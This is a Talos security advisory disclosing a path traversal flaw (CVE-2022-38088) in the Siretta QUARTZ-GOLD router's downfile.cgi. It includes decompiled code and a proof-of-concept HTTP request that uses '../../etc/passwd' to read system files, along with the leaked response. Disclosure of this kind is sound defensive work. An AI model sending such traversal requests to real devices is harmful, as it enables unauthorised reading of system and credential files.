# Talos Vulnerability Report
### TALOS-2022-1609
## Siretta QUARTZ-GOLD httpd downfile.cgi directory traversal vulnerability
##### January 26, 2023
##### CVE Number
CVE-2022-38088
##### SUMMARY
A directory traversal vulnerability exists in the httpd downfile.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to arbitrary file read. An attacker can send an HTTP request to trigger this vulnerability.
##### CONFIRMED VULNERABLE VERSIONS
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
Siretta QUARTZ-GOLD G5.0.1.5-210720-141020
##### PRODUCT URLS
QUARTZ-GOLD –
##### CVSSv3 SCORE
4.9 – CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
##### CWE
CWE-22 – Improper Limitation of a Pathname to a Restricted Directory (âPath Traversalâ)
##### DETAILS
The Siretta QUARTZ-GOLD is an industrial cellular router with several features and services, such as: SSH, UPNP, VPN, SNMP and many others.
The QUARTZ-GOLD router has a web server with several functionalities, a subset of which are related to the management of external files. Indeed, the web-server offers API for uploading files, downloading them, and also deleting if no longer required.
Following the API to download a previously uploaded file:
void downfile.cgi(void)
{
[…]
_filename_param = (char *)webcgi_safeget(“_filename”); [1]
filename = “”;
if (_filename_param != (char *)0x0) {
filename = _filename_param;
}
[… calculate base_folder …]
if (*filename != ”) {
sprintf(buff,”Content-Disposition:attachment;filename=”%s””,(char)filename);
send_header(200,buff,”application/tomato-binary-file”,0);
sprintf(buff,”%s/%s”,base_folder,filename); [2]
do_file(buff); [3]
}
return;
}
The `downfile.cgi` expects one parameter called `_filename` that represents the filename of the desired file to be downloaded. At `[1]` the uploaded parameter is taken and then used at `[2]` to compose the string `/`. Then, at `[3]`, the specified file is sent in the HTTP response. From `[1]` to `[2]` no sanitization for the `_filename` parameter is performed, which can lead to a path traversal vulnerability, allowing an attacker to download any file of the file system.
### Exploit Proof of Concept
Sending the following request to the web server:
POST /downfile.cgi HTTP/1.1
Authorization: Basic
Content-Length: 55
_filename=../../etc/passwd&_http_id=
Would result in the web server sending the following response:
HTTP/1.0 200 OK
Date: Sat, 01 Jan 2000 03:33:42 GMT
Content-Type: application/tomato-binary-file
Cache-Control: no-cache, no-store, must-revalidate, private
Expires: Thu, 31 Dec 1970 00:00:00 GMT
Pragma: no-cache
Content-Disposition:attachment;filename=”../../etc/passwd”
Connection: close
root:x:0:0:root:/root:/bin/sh
admin:x:0:0:admin:/root:/bin/sh
nobody:x:65534:65534:nobody:/dev/null:/dev/null
The response for this request is the contents of `/etc/passwd`.
##### TIMELINE
2022-10-14 – Initial Vendor Contact
2022-10-20 – Vendor Disclosure
2022-11-24 – Vendor Patch Release
2023-01-26 – Public Release
##### Credit
Discovered by Francesco Benvenuto of Cisco Talos.
* * *
Vulnerability Reports Next Report
TALOS-2022-1608
Previous Report
TALOS-2022-1607Read More